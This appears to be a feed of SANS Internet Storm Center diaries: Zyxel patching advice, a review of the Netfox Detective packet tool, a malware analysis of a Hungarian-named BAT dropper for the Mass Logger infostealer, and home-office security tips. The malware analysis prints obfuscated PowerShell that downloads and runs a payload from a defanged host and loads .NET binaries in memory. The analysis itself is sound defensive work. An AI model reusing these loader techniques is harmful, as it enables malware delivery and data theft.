  • If you are using affected devices: UPDATE NOW. See Zyxel's advisory here. Please call Zyxel support if you have questions.
  • If you are using any kind of firewall/gateway/router, no matter the vendor, limit its admin interface exposure to the minimum necessary. Avoid exposing web-based admin interfaces. Secure ssh access best you can (public keys…). In the case of a hidden admin account, these measures will likely not help, but see if you can disable password authentication. Of course, sometimes, vendors choose to hide ssh keys instead of passwords.
  • Figure out a way to automatically get alerts if a device is running out of date firmware. Daily vulnerability scans may help. Automatic firmware updates, if they are even an option, are often considered too risky for a perimeter device.
  • If you are a vendor creating these devices: get your act together. It is ridiculous how many "static keys", "support passwords" and simple web application vulnerabilities are found in your "security" devices. Look over the legacy code and do not rely on independent researchers to do your security testing.

And as a side note for Fortinet users. See what the new year just got you:

https://www.fortiguard.com/psirt?date=01-2021 . 

 

[1] https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html

[2] https://www.zyxel.com/support/CVE-2020-29583.shtml


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Netfox Detective: An Alternative Open-Source Packet Analysis Tool , (Tue, Jan 5th)

This post was originally published on this site

[This is a guest diary by Yee Ching Tok (personal website here (https://poppopretn.com)). Feedback welcome either via comments or our contact page (https://isc.sans.edu/contact.html)]

Various digital forensic artifacts are generated during intrusions and malware infections. Other than analyzing endpoint logs, memory and suspicious binaries, network packet captures offer a trove of information to incident handlers that could help them triage incidents quickly (such as determining if sensitive data had been exfiltrated). Popular tools such as WireShark, Ettercap, NetworkMiner or tcpdump are often used by incident handlers to analyze packet captures. However, there could be situations where a tool is unable to open up packet captures due to its size or being deliberately tampered (perhaps in Capture-the-Flag (CTF) challenges to increase difficulty and complexity). As such, being proficient in multiple alternative tools for packet analysis could come in handy, be it for handling incidents or for CTF challenges.

I recently came across an open-source tool for packet analysis named Netfox Detective [1], developed by the Networked and Embedded Systems Research Group at Brno University of Technology [2]. To showcase some of its features, I mainly used the packet capture created in my previous diary [3]. Firstly, with reference to Figure 1, a workspace needs to be created. As the name implies, the created workspace will contain artifacts such as packet captures or logs that would be analyzed (in this example, I only used network packet captures and did not import any logs).

Figure 1: Creation of Workspace for Analysis

Following that, I imported the network packet capture created in my previous diary [3] and Figure 2 shows an overview of the statistics of the packet capture. An interesting observation was that I did not know some packet loss occurred during the capture I made previously. It was also interesting to note that Netfox Detective utilized TCP heuristics that the creators have developed previously and improved on to mitigate corrupted or missing packets so as to collate as many network conversations as possible [4].

Figure 2: Overview of NAT Slipstreaming Packet Capture

As compared to WireShark where packets are displayed linearly, Netfox Detective has a tabbed view and displays the packets at Layer 3, Layer 4 and Layer 7 (linear option also available by selecting the “Frames” tab). Figure 3 shows the Layer 4 tab being selected and corresponding results being displayed.

Figure 3: Netfox Detective displaying Layer 4 Network Traffic

Selecting a conversation (highlighted in Figure 3) will add the selection in the “Conversation explorer” pane (highlighted by the red box in Figure 4). Double clicking the entry in “Conversation explorer” will create a new tab “Conversation detail” where a summary of the interaction is displayed (as shown in Figure 4). I found the Packet Sequence Chart to be very useful as it visualized when the various packets were transmitted with respect to their frame size.

Figure 4: Conversation detail view of 192.168.211.132 and 192.168.2.1

Following that, with reference to Figure 5, I selected frame number 336 for an in-depth look and we can see the ACK and RST flags being reflected in this packet (an expected finding as per the observations of NAT Slipstreaming experiment I done previously). 

Figure 5: Frame content view of Frame Number 336

There could be instances where analysis of multiple related network packet captures is needed in an incident. Netfox Detective allows multiple packet capture files to be imported into the same workspace (as shown in Figure 6). Over here, I used another packet capture created by Brad Duncan [5] to demonstrate the feature. 

Figure 6: Importing Multiple Packet Capture Files into the Same Workspace

As always, there are strengths and weaknesses in the various tools we use for packet analysis. Netfox Detective can only be installed on Microsoft Windows (Windows Vista SP2 or newer), and supports a smaller subset of protocols as compared to other tools such as WireShark [1]. However, the various tabbed views at Layer 3, 4 and 7, packet visualizations and ability to group related packet captures in a same workspace offers a refreshing perspective for incident handlers to perform their analysis/triage on network packet captures. Moreover, the open-source nature of Netfox Detective allows further enhancements to the tool itself.

For a complete read about Netfox Detective’s design decisions and technical implementations, their published paper is available here [4]. To download Netfox Detective, the information can be found on their GitHub page [1].

[1] https://github.com/nesfit/NetfoxDetective/
[2] https://nesfit.github.io/
[3] https://github.com/poppopretn/ISC-diaries-pcaps/blob/main/2020-11-NAT-Slipstream.zip
[4] https://doi.org/10.1016/j.fsidi.2020.301019
[5] https://www.malware-traffic-analysis.net/2020/11/10/index.html 
 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

From a small BAT file to Mass Logger infostealer, (Mon, Jan 4th)

This post was originally published on this site

Since another year went by, I’ve decided to once again check all of the malicious files, which were caught in my e-mail quarantine during its course. Last year, when I went through the batch of files from 2019, I found couple of very large samples[1] and I wanted to see whether I’d find something similar in the 2020 batch.

I started with just over 900 files of many different types and although I did notice couple of unusually large files, when one took their extensions into consideration (e.g. a JS file with size exceeding 1 MB, which turned out to be a sample of WSH RAT[2]), the largest sample in the batch overall was an EXE with the size of 17 MB. It was not small by any means, but its size was not too unusual either – it was definitely not in the same weight class as the 130 MB executable sent to us by one of our readers back in August[3].

On the other side of the size spectrum, situation was pretty much the same – there were also not any files which would be interesting because of their exceptional size (or lack thereof). While quickly going over the small files, one of them however did catch my eye. Among the smallest executable scripts was a 1.68 kB BAT file from September 2020 with the name of “A megállapodás feltételei_doc04361120200812113759-ACF.28668_DPJ2020012681851.PDF.bat” (first part roughly translates as “Terms of agreement” from Hungarian), which contained the following slightly obfuscated PowerShell script, which turned out to be quite interesting.

@echo off

Start /MIN Powershell -WindowStyle Hidden -command "$Dxjyp='D4@C7@72@72...
...
...F6@26@45@42';
$text =$Dxjyp.ToCharArray();
[Array]::Reverse($text);
$tu=-join $text;
$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};
$jm -join ''|I`E`X"

After reversing and decoding the contents of the $Dxjyp variable, the main body of the script became readable. The script was supposed to download and execute contents of the file A12.jpg downloaded from http[:]//topometria[.]com[.]cy.

$Tbone='*EX'.replace('*','I');
sal M $Tbone;
do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
[System.Net.ServicePointManager]::SecurityProtocol = $p22;
$mv='(N'+'ew'+'-O'+'b'+'je'+'c'+'t '+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'S'+'tr'+'ing(''http[:]//topometria[.]com[.]cy/A12.jpg'')'|I`E`X;
$asciiChars= $mv -split '-' |ForEach-Object {[char][byte]"0x$_"};
$asciiString= $asciiChars -join ''|M

The URL contained withing the script is no longer active, but I managed to find a copy of the A12.jpg file downloaded in an Any.Run task from September, in which someone analyzed differently named (but functionally identical) version of the batch script[4].

The JPG file (that was of course not JPG at all) was 3.25 MB in size. This turned out not to be too much when one considers that it contained the main malicious payload in the form of one EXE and one DLL, but before we get to these files, let’s quickly take a look at A12.jpg.

Its contents looked exactly as one would expect given the last two lines of the PowerShell code we’ve seen above (i.e. hex-encoded ASCII characters separated by hyphens).

24-74-30-3D-2D-4A-6F-69-6E-20-28-28-31-31-...
...
... 0D-0A-20-20-0D-0A-0D-0A-0D-0A-20-20

At this point it is good to mention that for the purposes of analyzing any potentially malicious code, it can be invaluable to remember hex values of several of ASCII characters. Besides the usual “M” (0x4D) and “Z” (0x5A), which create the header of Windows PE executables, as well as couple of others, it may be a good idea to also remember that “$” has the hex value 0x24. In this way, even if we got our hands on the A12.JPG file without any other context, we might deduce that it might contain code in one of the languages, in which the dollar sign is used to denote variables.

After decoding the downloaded file, it became obvious that it did indeed contain a part of a PowerShell script. What was especially interesting about it were two variables which seemed to each contain a PE structure.

$t0=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});
sal g $t0
[String]$nebj='4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^...
...
...>^'.replace('>^','00')

function PuKkpsGJ {
    param($gPPqxvJ)
    $gPPqxvJ = $gPPqxvJ -split '(..)' | ? { $_ }
    ForEach ($wbdtbuBT in $gPPqxvJ){
        [Convert]::ToInt32($wbdtbuBT,16)
    }
}
[String]$CDbvWcpeO='4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^...
...
...>^'.replace('>^','00')

[Byte[]]$JJAr=PuKkpsGJ $CDbvWcpeO
$y='[System.Ap!%%%%#######@@@@@@@****************ain]'.replace('!%%%%#######@@@@@@@****************','pDom')|g;
$g55=$y.GetMethod("get_CurrentDomain")
$uy='$g55.In!%%%%#######@@@@@@@****************ke($null,$null)'.replace('!%%%%#######@@@@@@@****************','vo')| g
$vmc2='$uy.Lo!%%%%#######@@@@@@@****************($JJAr)'.Replace('!%%%%#######@@@@@@@****************','ad')
$vmc2| g
[Byte[]]$nebj2= PuKkpsGJ $nebj
[g8fg0000.gfjhfdgpoerkj]::gihjpdfg('InstallUtil.exe',$nebj2)

Indeed, after replacing all of the “>^” pairs in the two variables with “00” and saving the resultant values from each of the variables in a file, the hypothesis was proven true. There were indeed two PE files contained within the script – one 42 kB DLL and one 514 kB EXE, both written in the .NET family of languages.

After a little more deobfuscation of the script in A12.jpg, it became obvious that it basically amounted to the following two lines of code, in which the purpose of the two files can be clearly seen – the script was supposed to load the DLL into memory and then ensure execution of the main malicious executable with its help.

[System.AppDomain].GetMethod("get_CurrentDomain").Invoke($null,$null).Load([DLL file])| IEX
[g8fg0000.gfjhfdgpoerkj]::gihjpdfg('InstallUtil.exe',[EXE file])

Indeed, you may see the relevant part of the DLL in the following image.

After a quick analysis, the EXE file itself turned out to be a sample of the Mass Logger infostealer.

Although I didn’t find any exceptionally large or small malicious files in the batch of quarantined e-mails from 2020, the small BAT file discussed above turned out to be quite interesting in its own way, as the following chart summarizes.

Let us see what 2021 brings us in terms of malware – perhaps next year, we will have a chance to take a look at something exceptionally small or unusually large again…

Indicators of Compromise (IoCs)

A megállapodás feltételei_doc04361120200812113759-ACF.28668_DPJ2020012681851.PDF.bat (1.68 kB)
MD5 – 71bdecdea1d86dd3e892ca52c534fa13
SHA1 – 72071a7e760c348c53be53b6d6a073f9d70fbc4b

A12.jpg (3.25 MB)
MD5 – 60b86e4eac1d3eeab9980137017d3f65
SHA1 – d41b417a925fb7c4a903dd91104ed96dc6e1982b

ManagmentClass.dll (42 kB)
MD5 – 8a738f0e16c427c9de68f370b2363230
SHA1 – 0ac18d2838ce41fe0bdc2ffca98106cadfa0e9b5

service-nankasa.com-LoggerBin.exe (514 kB)
MD5 – 4b99184764b326b10640a6760111403d
SHA1 – 2a61222d0bd7106611003dd5079fcef2a9012a70

[1] https://isc.sans.edu/forums/diary/Picks+of+2019+malware+the+large+the+small+and+the+one+full+of+null+bytes/25718
[2] https://app.any.run/tasks/801cb6a1-6c66-4b98-8b38-14b3e56d660a/
[3] https://isc.sans.edu/forums/diary/Definition+of+overkill+using+130+MB+executable+to+hide+24+kB+malware/26464/
[4] https://app.any.run/tasks/32b4519f-3c10-40f5-a65a-7db9c3a57fd0/

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Protecting Home Office and Enterprise in 2021, (Sat, Jan 2nd)

This post was originally published on this site

Because of COVID, 2020 saw a major shift from working at the "office" to working at home which led to shift the attacks to the user @home. Everything points that 2020 was a year for ransomware and COVID-19 themed campaigns. Without exceptions, phishing emails have been the most prolific initial attack vector targeting organizations and home users. This will likely get worse and more disruptive this coming year.

Past 14 Days – My IP Threat Intel Activity

Every year there are prediction on what we should expect in the coming year and what to watch for. Instead, what can be done to secure the enterprise?

  • Implement multi-factor authentication
  • Extending security to a remote force
  • Review cloud security policies
  • Better protection for IoT
  • Must ensure backups are secure and cannot be reached to prevent attackers from finding and delete them
  • Equally important – regularly test backups to ensure the data can be recovered
  • Use and share Threat Intel to track suspicious activity [1][2]
  • Better network analytics and log collection [3][4][5]
  • Monitor host and network activity [3][4][5]
  • Better detection and prevention against phishing email attacks [10]
  • Review and test employees against security awareness program [11]
  • Apply system security update as soon as appropriate
  • Keep antivirus software current

Over the past year, one of the most difficult tasks has been how to detect and prevent being compromised by unmanaged devices. With a large population of employees working from a home office, some forced to use their personal devices, if compromised, have the potential of exploiting other systems in their home network as well as the enterprise connected network (i.e. VPN access to employer network). This challenge will continue for the forceable future.

Share your predictions for 2021, what is going to keep you up at night?

[1] https://www.anomali.com/resources/staxx
[2] https://otx.alienvault.com
[3] https://www.elastic.co
[4] http://rocknsm.io
[5] https://securityonionsolutions.com
[6] https://us-cert.cisa.gov
[7] https://cyber.gc.ca
[8] https://www.ncsc.gov.uk
[9] https://www.enisa.europa.eu/topics/csirts-in-europe
[10] https://cyber.gc.ca/en/assemblyline
[11] https://www.sans.org/security-awareness-training?msc=main-nav

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Iron Castle Systems